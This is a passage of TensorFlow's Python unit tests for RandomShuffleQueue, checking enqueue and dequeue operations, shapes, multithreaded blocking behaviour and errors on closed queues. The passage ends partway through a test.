# limitations under the License.
# ==============================================================================
"""Tests for tensorflow.ops.data_flow_ops.Queue."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import random
import re
import time
import numpy as np
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes as dtypes_lib
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import random_seed
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.platform import test
from tensorflow.python.platform import tf_logging
class RandomShuffleQueueTest(test.TestCase):
def setUp(self):
# Useful for debugging when a test times out.
super(RandomShuffleQueueTest, self).setUp()
tf_logging.error("Starting: %s", self._testMethodName)
def tearDown(self):
super(RandomShuffleQueueTest, self).tearDown()
tf_logging.error("Finished: %s", self._testMethodName)
def testEnqueue(self):
with self.test_session():
q = data_flow_ops.RandomShuffleQueue(10, 5, dtypes_lib.float32)
enqueue_op = q.enqueue((10.0,))
self.assertAllEqual(0, q.size().eval())
enqueue_op.run()
self.assertAllEqual(1, q.size().eval())
def testEnqueueWithShape(self):
with self.test_session():
q = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shapes=tensor_shape.TensorShape([3, 2]))
enqueue_correct_op = q.enqueue(([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]],))
enqueue_correct_op.run()
self.assertAllEqual(1, q.size().eval())
with self.assertRaises(ValueError):
q.enqueue(([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]],))
def testEnqueueManyWithShape(self):
with self.test_session():
q = data_flow_ops.RandomShuffleQueue(
10, 5, [dtypes_lib.int32, dtypes_lib.int32], shapes=[(), (2,)])
q.enqueue_many([[1, 2, 3, 4], [[1, 1], [2, 2], [3, 3], [4, 4]]]).run()
self.assertAllEqual(4, q.size().eval())
q2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, shapes=tensor_shape.TensorShape([3]))
q2.enqueue(([1, 2, 3],))
q2.enqueue_many(([[1, 2, 3]],))
def testScalarShapes(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
10, 0, [dtypes_lib.int32, dtypes_lib.int32], shapes=[(), (1,)])
q.enqueue_many([[1, 2, 3, 4], [[5], [6], [7], [8]]]).run()
q.enqueue([9, [10]]).run()
dequeue_t = q.dequeue()
results = []
for _ in range(2):
a, b = sess.run(dequeue_t)
results.append((a, b))
a, b = sess.run(q.dequeue_many(3))
for i in range(3):
results.append((a[i], b[i]))
self.assertItemsEqual([(1, [5]), (2, [6]), (3, [7]), (4, [8]), (9, [10])],
results)
def testParallelEnqueue(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
enqueue_ops = [q.enqueue((x,)) for x in elems]
dequeued_t = q.dequeue()
# Run one producer thread for each element in elems.
def enqueue(enqueue_op):
sess.run(enqueue_op)
threads = [
self.checkedThread(
target=enqueue, args=(e,)) for e in enqueue_ops
]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
# Dequeue every element using a single thread.
results = []
for _ in xrange(len(elems)):
results.append(dequeued_t.eval())
self.assertItemsEqual(elems, results)
def testParallelDequeue(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
enqueue_ops = [q.enqueue((x,)) for x in elems]
dequeued_t = q.dequeue()
# Enqueue every element using a single thread.
for enqueue_op in enqueue_ops:
enqueue_op.run()
# Run one consumer thread for each element in elems.
results = []
def dequeue():
results.append(sess.run(dequeued_t))
threads = [self.checkedThread(target=dequeue) for _ in enqueue_ops]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertItemsEqual(elems, results)
def testDequeue(self):
with self.test_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0]
enqueue_ops = [q.enqueue((x,)) for x in elems]
dequeued_t = q.dequeue()
for enqueue_op in enqueue_ops:
enqueue_op.run()
vals = [dequeued_t.eval() for _ in xrange(len(elems))]
self.assertItemsEqual(elems, vals)
def testEnqueueAndBlockingDequeue(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(3, 0, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0]
enqueue_ops = [q.enqueue((x,)) for x in elems]
dequeued_t = q.dequeue()
def enqueue():
# The enqueue_ops should run after the dequeue op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
for enqueue_op in enqueue_ops:
sess.run(enqueue_op)
results = []
def dequeue():
for _ in xrange(len(elems)):
results.append(sess.run(dequeued_t))
enqueue_thread = self.checkedThread(target=enqueue)
dequeue_thread = self.checkedThread(target=dequeue)
enqueue_thread.start()
dequeue_thread.start()
enqueue_thread.join()
dequeue_thread.join()
self.assertItemsEqual(elems, results)
def testMultiEnqueueAndDequeue(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
10, 0, (dtypes_lib.int32, dtypes_lib.float32))
elems = [(5, 10.0), (10, 20.0), (15, 30.0)]
enqueue_ops = [q.enqueue((x, y)) for x, y in elems]
dequeued_t = q.dequeue()
for enqueue_op in enqueue_ops:
enqueue_op.run()
results = []
for _ in xrange(len(elems)):
x, y = sess.run(dequeued_t)
results.append((x, y))
self.assertItemsEqual(elems, results)
def testQueueSizeEmpty(self):
with self.test_session():
q = data_flow_ops.RandomShuffleQueue(10, 5, dtypes_lib.float32)
self.assertEqual(0, q.size().eval())
def testQueueSizeAfterEnqueueAndDequeue(self):
with self.test_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
enqueue_op = q.enqueue((10.0,))
dequeued_t = q.dequeue()
size = q.size()
self.assertEqual([], size.get_shape())
enqueue_op.run()
self.assertEqual([1], size.eval())
dequeued_t.op.run()
self.assertEqual([0], size.eval())
def testEnqueueMany(self):
with self.test_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue()
enqueue_op.run()
enqueue_op.run()
results = []
for _ in range(8):
results.append(dequeued_t.eval())
self.assertItemsEqual(elems + elems, results)
def testEmptyEnqueueMany(self):
with self.test_session():
q = data_flow_ops.RandomShuffleQueue(10, 5, dtypes_lib.float32)
empty_t = constant_op.constant(
[], dtype=dtypes_lib.float32, shape=[0, 2, 3])
enqueue_op = q.enqueue_many((empty_t,))
size_t = q.size()
self.assertEqual(0, size_t.eval())
enqueue_op.run()
self.assertEqual(0, size_t.eval())
def testEmptyDequeueMany(self):
with self.test_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, shapes=())
enqueue_op = q.enqueue((10.0,))
dequeued_t = q.dequeue_many(0)
self.assertEqual([], dequeued_t.eval().tolist())
enqueue_op.run()
self.assertEqual([], dequeued_t.eval().tolist())
def testEmptyDequeueUpTo(self):
with self.test_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, shapes=())
enqueue_op = q.enqueue((10.0,))
dequeued_t = q.dequeue_up_to(0)
self.assertEqual([], dequeued_t.eval().tolist())
enqueue_op.run()
self.assertEqual([], dequeued_t.eval().tolist())
def testEmptyDequeueManyWithNoShape(self):
with self.test_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
enqueue_op = q.enqueue((constant_op.constant(
[10.0, 20.0], shape=(1, 2)),))
dequeued_t = q.dequeue_many(0)
# Expect the operation to fail due to the shape not being constrained.
with self.assertRaisesOpError(
"require the components to have specified shapes"):
dequeued_t.eval()
enqueue_op.run()
# RandomShuffleQueue does not make any attempt to support DequeueMany
# with unspecified shapes, even if a shape could be inferred from the
# elements enqueued.
with self.assertRaisesOpError(
"require the components to have specified shapes"):
dequeued_t.eval()
def testEmptyDequeueUpToWithNoShape(self):
with self.test_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
enqueue_op = q.enqueue((constant_op.constant(
[10.0, 20.0], shape=(1, 2)),))
dequeued_t = q.dequeue_up_to(0)
# Expect the operation to fail due to the shape not being constrained.
with self.assertRaisesOpError(
"require the components to have specified shapes"):
dequeued_t.eval()
enqueue_op.run()
# RandomShuffleQueue does not make any attempt to support DequeueUpTo
# with unspecified shapes, even if a shape could be inferred from the
# elements enqueued.
with self.assertRaisesOpError(
"require the components to have specified shapes"):
dequeued_t.eval()
def testMultiEnqueueMany(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
10, 0, (dtypes_lib.float32, dtypes_lib.int32))
float_elems = [10.0, 20.0, 30.0, 40.0]
int_elems = [[1, 2], [3, 4], [5, 6], [7, 8]]
enqueue_op = q.enqueue_many((float_elems, int_elems))
dequeued_t = q.dequeue()
enqueue_op.run()
enqueue_op.run()
results = []
for _ in range(8):
float_val, int_val = sess.run(dequeued_t)
results.append((float_val, [int_val[0], int_val[1]]))
expected = list(zip(float_elems, int_elems)) * 2
self.assertItemsEqual(expected, results)
def testDequeueMany(self):
with self.test_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(5)
enqueue_op.run()
results = dequeued_t.eval().tolist()
results.extend(dequeued_t.eval())
self.assertItemsEqual(elems, results)
def testDequeueUpToNoBlocking(self):
with self.test_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_up_to(5)
enqueue_op.run()
results = dequeued_t.eval().tolist()
results.extend(dequeued_t.eval())
self.assertItemsEqual(elems, results)
def testMultiDequeueMany(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
10, 0, (dtypes_lib.float32, dtypes_lib.int32), shapes=((), (2,)))
float_elems = [
10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0
]
int_elems = [[1, 2], [3, 4], [5, 6], [7, 8], [9, 10], [11, 12], [13, 14],
[15, 16], [17, 18], [19, 20]]
enqueue_op = q.enqueue_many((float_elems, int_elems))
dequeued_t = q.dequeue_many(4)
dequeued_single_t = q.dequeue()
enqueue_op.run()
results = []
float_val, int_val = sess.run(dequeued_t)
self.assertEqual(float_val.shape, dequeued_t[0].get_shape())
self.assertEqual(int_val.shape, dequeued_t[1].get_shape())
results.extend(zip(float_val, int_val.tolist()))
float_val, int_val = sess.run(dequeued_t)
results.extend(zip(float_val, int_val.tolist()))
float_val, int_val = sess.run(dequeued_single_t)
self.assertEqual(float_val.shape, dequeued_single_t[0].get_shape())
self.assertEqual(int_val.shape, dequeued_single_t[1].get_shape())
results.append((float_val, int_val.tolist()))
float_val, int_val = sess.run(dequeued_single_t)
results.append((float_val, int_val.tolist()))
self.assertItemsEqual(zip(float_elems, int_elems), results)
def testMultiDequeueUpToNoBlocking(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
10, 0, (dtypes_lib.float32, dtypes_lib.int32), shapes=((), (2,)))
float_elems = [
10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0
]
int_elems = [[1, 2], [3, 4], [5, 6], [7, 8], [9, 10], [11, 12], [13, 14],
[15, 16], [17, 18], [19, 20]]
enqueue_op = q.enqueue_many((float_elems, int_elems))
dequeued_t = q.dequeue_up_to(4)
dequeued_single_t = q.dequeue()
enqueue_op.run()
results = []
float_val, int_val = sess.run(dequeued_t)
# dequeue_up_to has undefined shape.
self.assertEqual([None], dequeued_t[0].get_shape().as_list())
self.assertEqual([None, 2], dequeued_t[1].get_shape().as_list())
results.extend(zip(float_val, int_val.tolist()))
float_val, int_val = sess.run(dequeued_t)
results.extend(zip(float_val, int_val.tolist()))
float_val, int_val = sess.run(dequeued_single_t)
self.assertEqual(float_val.shape, dequeued_single_t[0].get_shape())
self.assertEqual(int_val.shape, dequeued_single_t[1].get_shape())
results.append((float_val, int_val.tolist()))
float_val, int_val = sess.run(dequeued_single_t)
results.append((float_val, int_val.tolist()))
self.assertItemsEqual(zip(float_elems, int_elems), results)
def testHighDimension(self):
with self.test_session():
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.int32, (
(4, 4, 4, 4)))
elems = np.array([[[[[x] * 4] * 4] * 4] * 4 for x in range(10)], np.int32)
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(10)
enqueue_op.run()
self.assertItemsEqual(dequeued_t.eval().tolist(), elems.tolist())
def testParallelEnqueueMany(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
1000, 0, dtypes_lib.float32, shapes=())
elems = [10.0 * x for x in range(100)]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(1000)
# Enqueue 100 items in parallel on 10 threads.
def enqueue():
sess.run(enqueue_op)
threads = [self.checkedThread(target=enqueue) for _ in range(10)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertItemsEqual(dequeued_t.eval(), elems * 10)
def testParallelDequeueMany(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
1000, 0, dtypes_lib.float32, shapes=())
elems = [10.0 * x for x in range(1000)]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(100)
enqueue_op.run()
# Dequeue 100 items in parallel on 10 threads.
dequeued_elems = []
def dequeue():
dequeued_elems.extend(sess.run(dequeued_t))
threads = [self.checkedThread(target=dequeue) for _ in range(10)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertItemsEqual(elems, dequeued_elems)
def testParallelDequeueUpTo(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
1000, 0, dtypes_lib.float32, shapes=())
elems = [10.0 * x for x in range(1000)]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_up_to(100)
enqueue_op.run()
# Dequeue 100 items in parallel on 10 threads.
dequeued_elems = []
def dequeue():
dequeued_elems.extend(sess.run(dequeued_t))
threads = [self.checkedThread(target=dequeue) for _ in range(10)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertItemsEqual(elems, dequeued_elems)
def testParallelDequeueUpToRandomPartition(self):
with self.test_session() as sess:
dequeue_sizes = [random.randint(50, 150) for _ in xrange(10)]
total_elements = sum(dequeue_sizes)
q = data_flow_ops.RandomShuffleQueue(
total_elements, 0, dtypes_lib.float32, shapes=())
elems = [10.0 * x for x in xrange(total_elements)]
enqueue_op = q.enqueue_many((elems,))
dequeue_ops = [q.dequeue_up_to(size) for size in dequeue_sizes]
enqueue_op.run()
# Dequeue random number of items in parallel on 10 threads.
dequeued_elems = []
def dequeue(dequeue_op):
dequeued_elems.extend(sess.run(dequeue_op))
threads = []
for dequeue_op in dequeue_ops:
threads.append(self.checkedThread(target=dequeue, args=(dequeue_op,)))
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertItemsEqual(elems, dequeued_elems)
def testBlockingDequeueMany(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(4)
dequeued_elems = []
def enqueue():
# The enqueue_op should run after the dequeue op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
sess.run(enqueue_op)
def dequeue():
dequeued_elems.extend(sess.run(dequeued_t).tolist())
enqueue_thread = self.checkedThread(target=enqueue)
dequeue_thread = self.checkedThread(target=dequeue)
enqueue_thread.start()
dequeue_thread.start()
enqueue_thread.join()
dequeue_thread.join()
self.assertItemsEqual(elems, dequeued_elems)
def testBlockingDequeueUpTo(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_up_to(4)
dequeued_elems = []
def enqueue():
# The enqueue_op should run after the dequeue op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
sess.run(enqueue_op)
def dequeue():
dequeued_elems.extend(sess.run(dequeued_t).tolist())
enqueue_thread = self.checkedThread(target=enqueue)
dequeue_thread = self.checkedThread(target=dequeue)
enqueue_thread.start()
dequeue_thread.start()
enqueue_thread.join()
dequeue_thread.join()
self.assertItemsEqual(elems, dequeued_elems)
def testDequeueManyWithTensorParameter(self):
with self.test_session():
# Define a first queue that contains integer counts.
dequeue_counts = [random.randint(1, 10) for _ in range(100)]
count_q = data_flow_ops.RandomShuffleQueue(100, 0, dtypes_lib.int32)
enqueue_counts_op = count_q.enqueue_many((dequeue_counts,))
total_count = sum(dequeue_counts)
# Define a second queue that contains total_count elements.
elems = [random.randint(0, 100) for _ in range(total_count)]
q = data_flow_ops.RandomShuffleQueue(total_count, 0, dtypes_lib.int32, (
(),))
enqueue_elems_op = q.enqueue_many((elems,))
# Define a subgraph that first dequeues a count, then DequeuesMany
# that number of elements.
dequeued_t = q.dequeue_many(count_q.dequeue())
enqueue_counts_op.run()
enqueue_elems_op.run()
dequeued_elems = []
for _ in dequeue_counts:
dequeued_elems.extend(dequeued_t.eval())
self.assertItemsEqual(elems, dequeued_elems)
def testDequeueUpToWithTensorParameter(self):
with self.test_session():
# Define a first queue that contains integer counts.
dequeue_counts = [random.randint(1, 10) for _ in range(100)]
count_q = data_flow_ops.RandomShuffleQueue(100, 0, dtypes_lib.int32)
enqueue_counts_op = count_q.enqueue_many((dequeue_counts,))
total_count = sum(dequeue_counts)
# Define a second queue that contains total_count elements.
elems = [random.randint(0, 100) for _ in range(total_count)]
q = data_flow_ops.RandomShuffleQueue(total_count, 0, dtypes_lib.int32, (
(),))
enqueue_elems_op = q.enqueue_many((elems,))
# Define a subgraph that first dequeues a count, then DequeuesUpTo
# that number of elements.
dequeued_t = q.dequeue_up_to(count_q.dequeue())
enqueue_counts_op.run()
enqueue_elems_op.run()
dequeued_elems = []
for _ in dequeue_counts:
dequeued_elems.extend(dequeued_t.eval())
self.assertItemsEqual(elems, dequeued_elems)
def testDequeueFromClosedQueue(self):
with self.test_session():
q = data_flow_ops.RandomShuffleQueue(10, 2, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue()
enqueue_op.run()
close_op.run()
results = [dequeued_t.eval() for _ in elems]
expected = [[elem] for elem in elems]
self.assertItemsEqual(expected, results)
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
dequeued_t.eval()
def testBlockingDequeueFromClosedQueue(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 2, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue()
enqueue_op.run()
results = []
def dequeue():
for _ in elems:
results.append(sess.run(dequeued_t))
self.assertItemsEqual(elems, results)
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
sess.run(dequeued_t)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
# The dequeue thread blocked when it hit the min_size requirement.
self.assertEqual(len(results), 2)
close_op.run()
dequeue_thread.join()
# Once the queue is closed, the min_size requirement is lifted.
self.assertEqual(len(results), 4)
def testBlockingDequeueFromClosedEmptyQueue(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
close_op = q.close()
dequeued_t = q.dequeue()
finished = [] # Needs to be a mutable type
def dequeue():
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
sess.run(dequeued_t)
finished.append(True)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
self.assertEqual(len(finished), 0)
close_op.run()
dequeue_thread.join()
self.assertEqual(len(finished), 1)
def testBlockingDequeueManyFromClosedQueue(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue_many(4)
enqueue_op.run()
progress = [] # Must be mutable
def dequeue():
self.assertItemsEqual(elems, sess.run(dequeued_t))
progress.append(1)
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
sess.run(dequeued_t)
progress.append(2)
self.assertEqual(len(progress), 0)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
for _ in range(100):
time.sleep(0.01)
if len(progress) == 1:
break
self.assertEqual(len(progress), 1)
time.sleep(0.01)
close_op.run()
dequeue_thread.join()
self.assertEqual(len(progress), 2)
def testBlockingDequeueUpToFromClosedQueueReturnsRemainder(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue_up_to(3)
enqueue_op.run()
results = []
def dequeue():
results.extend(sess.run(dequeued_t))
self.assertEqual(3, len(results))
results.extend(sess.run(dequeued_t))
self.assertEqual(4, len(results))
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
self.assertItemsEqual(results, elems)
def testBlockingDequeueUpToSmallerThanMinAfterDequeue(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(
capacity=10,
min_after_dequeue=2,
dtypes=dtypes_lib.float32,
shapes=((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue_up_to(3)
enqueue_op.run()
results = []
def dequeue():
results.extend(sess.run(dequeued_t))
self.assertEqual(3, len(results))
# min_after_dequeue is 2, we ask for 3 elements, and we end up only
# getting the remaining 1.
results.extend(sess.run(dequeued_t))
self.assertEqual(4, len(results))
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
self.assertItemsEqual(results, elems)
def testBlockingDequeueManyFromClosedQueueWithElementsRemaining(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue_many(3)
cleanup_dequeue_t = q.dequeue_many(q.size())
enqueue_op.run()
results = []
def dequeue():
results.extend(sess.run(dequeued_t))
self.assertEqual(len(results), 3)
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
sess.run(dequeued_t)
# While the last dequeue failed, we want to ensure that it returns
# any elements that it potentially reserved to dequeue. Thus the
# next cleanup should return a single element.
results.extend(sess.run(cleanup_dequeue_t))
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
self.assertEqual(len(results), 4)
def testBlockingDequeueManyFromClosedEmptyQueue(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 5, dtypes_lib.float32, ((),))
close_op = q.close()
dequeued_t = q.dequeue_many(4)
def dequeue():
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
sess.run(dequeued_t)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
def testBlockingDequeueUpToFromClosedEmptyQueue(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 5, dtypes_lib.float32, ((),))
close_op = q.close()
dequeued_t = q.dequeue_up_to(4)
def dequeue():
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
sess.run(dequeued_t)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
def testEnqueueToClosedQueue(self):
with self.test_session():
q = data_flow_ops.RandomShuffleQueue(10, 4, dtypes_lib.float32)
enqueue_op = q.enqueue((10.0,))
close_op = q.close()
enqueue_op.run()
close_op.run()
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.CancelledError, "is closed"):
enqueue_op.run()
def testEnqueueManyToClosedQueue(self):
with self.test_session():
q = data_flow_ops.RandomShuffleQueue(10, 5, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
enqueue_op.run()
close_op.run()
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.CancelledError, "is closed"):
enqueue_op.run()
def testBlockingEnqueueToFullQueue(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(4, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
blocking_enqueue_op = q.enqueue((50.0,))
dequeued_t = q.dequeue()
enqueue_op.run()
def blocking_enqueue():
sess.run(blocking_enqueue_op)
thread = self.checkedThread(target=blocking_enqueue)
thread.start()
# The dequeue ops should run after the blocking_enqueue_op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
results = []
for _ in elems:
results.append(dequeued_t.eval())
results.append(dequeued_t.eval())
self.assertItemsEqual(elems + [50.0], results)
# There wasn't room for 50.0 in the queue when the first element was
# dequeued.
self.assertNotEqual(50.0, results[0])
thread.join()
def testBlockingEnqueueManyToFullQueue(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(4, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
blocking_enqueue_op = q.enqueue_many(([50.0, 60.0],))
dequeued_t = q.dequeue()
enqueue_op.run()
def blocking_enqueue():
sess.run(blocking_enqueue_op)
thread = self.checkedThread(target=blocking_enqueue)
thread.start()
# The dequeue ops should run after the blocking_enqueue_op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
results = []
for _ in elems:
time.sleep(0.01)
results.append(dequeued_t.eval())
results.append(dequeued_t.eval())
results.append(dequeued_t.eval())
self.assertItemsEqual(elems + [50.0, 60.0], results)
# There wasn't room for 50.0 or 60.0 in the queue when the first
# element was dequeued.
self.assertNotEqual(50.0, results[0])
self.assertNotEqual(60.0, results[0])
# Similarly for 60.0 and the second element.
self.assertNotEqual(60.0, results[1])
thread.join()
def testBlockingEnqueueToClosedQueue(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(4, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
blocking_enqueue_op = q.enqueue((50.0,))
dequeued_t = q.dequeue()
close_op = q.close()
enqueue_op.run()
def blocking_enqueue():
# Expect the operation to succeed since it will complete
# before the queue is closed.
sess.run(blocking_enqueue_op)
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.CancelledError, "closed"):
sess.run(blocking_enqueue_op)
thread1 = self.checkedThread(target=blocking_enqueue)
thread1.start()
# The close_op should run after the first blocking_enqueue_op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
def blocking_close():
sess.run(close_op)
thread2 = self.checkedThread(target=blocking_close)
thread2.start()
# Wait for the close op to block before unblocking the enqueue.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
results = []
# Dequeue to unblock the first blocking_enqueue_op, after which the
# close will complete.
results.append(dequeued_t.eval())
self.assertTrue(results[0] in elems)
thread2.join()
thread1.join()
def testBlockingEnqueueManyToClosedQueue(self):
with self.test_session() as sess:
q = data_flow_ops.RandomShuffleQueue(4, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0]
enqueue_op = q.enqueue_many((elems,))
blocking_enqueue_op = q.enqueue_many(([50.0, 60.0],))
close_op = q.close()
size_t = q.size()
enqueue_op.run()
